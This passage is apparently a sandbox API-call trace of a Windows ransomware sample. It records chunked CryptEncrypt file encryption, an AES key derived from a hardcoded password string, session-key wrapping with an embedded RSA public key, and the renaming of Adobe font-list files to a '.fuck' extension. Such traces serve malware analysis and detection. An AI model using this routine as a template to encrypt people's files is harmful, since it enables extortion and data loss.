nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.701] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.701] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.701] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.701] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.701] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.701] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.701] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.701] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.701] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.702] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.702] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.702] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.702] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.702] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.702] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.702] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.702] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.702] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.702] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.702] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.702] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.702] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.702] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.702] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.703] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.703] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.703] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.703] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.703] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.703] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.703] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.703] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.703] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.703] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.703] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.703] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.703] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.703] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.703] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.704] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.704] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.704] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.704] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.704] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.704] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.704] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.704] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.704] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.704] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.704] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.704] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.704] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.704] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.705] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.705] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.705] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.705] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.705] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.705] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.705] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.705] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x33f, lpOverlapped=0x0) returned 1 [0241.705] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x33f, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x340) returned 1 [0241.706] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x340, lpOverlapped=0x0) returned 1 [0241.706] CloseHandle (hObject=0x5d40) returned 1 [0241.706] CloseHandle (hObject=0x5d44) returned 1 [0241.711] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeSysFnt15.lst.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobesysfnt15.lst.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeSysFnt15.lst" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobesysfnt15.lst"), bFailIfExists=0) returned 1 [0241.720] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeSysFnt15.lst", dwFileAttributes=0x0) returned 1 [0241.722] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeSysFnt15.lst.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobesysfnt15.lst.gsg")) returned 1 [0241.725] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeSysFnt15.lst" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobesysfnt15.lst"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeSysFnt15.lst.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobesysfnt15.lst.fuck")) returned 1 [0241.726] CryptDestroyHash (hHash=0x28e7df8) returned 1 [0241.726] CryptDestroyKey (hKey=0x28e82b8) returned 1 [0241.726] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0241.726] FindNextFileA (in: hFindFile=0x28e7d78, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0241.727] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0241.727] GetLastError () returned 0x0 [0241.727] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeSysFnt17.lst" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobesysfnt17.lst")) returned 0x20 [0241.727] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeSysFnt17.lst", dwFileAttributes=0x80) returned 1 [0241.728] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeSysFnt17.lst" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobesysfnt17.lst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0241.728] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeSysFnt17.lst.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobesysfnt17.lst.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0241.728] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeSysFnt17.lst.gsg", dwFileAttributes=0x2) returned 1 [0241.729] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28f6348) returned 1 [0241.732] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0241.732] lstrlenA (lpString="cjCYuiydaGDqRLBosfDTjZpnzMlQm") returned 29 [0241.732] CryptHashData (hHash=0x28e8078, pbData=0x2857218, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0241.732] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8078, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28e7df8) returned 1 [0241.732] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0241.732] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0241.732] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28f4cf8) returned 1 [0241.733] CryptImportPublicKeyInfo (in: hCryptProv=0x28f4cf8, dwCertEncodingType=0x1, pInfo=0x2936890*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29368c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29368c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28e7b78) returned 1 [0241.733] CryptEncrypt (in: hKey=0x28e7b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0241.733] CryptEncrypt (in: hKey=0x28e7b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f41d0*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28f41d0*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0241.733] WriteFile (in: hFile=0x5d40, lpBuffer=0x28f41d0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x28f41d0*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0241.734] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.743] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.743] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.751] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.754] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.754] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.754] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.754] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.754] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.754] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.754] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.754] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.754] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: 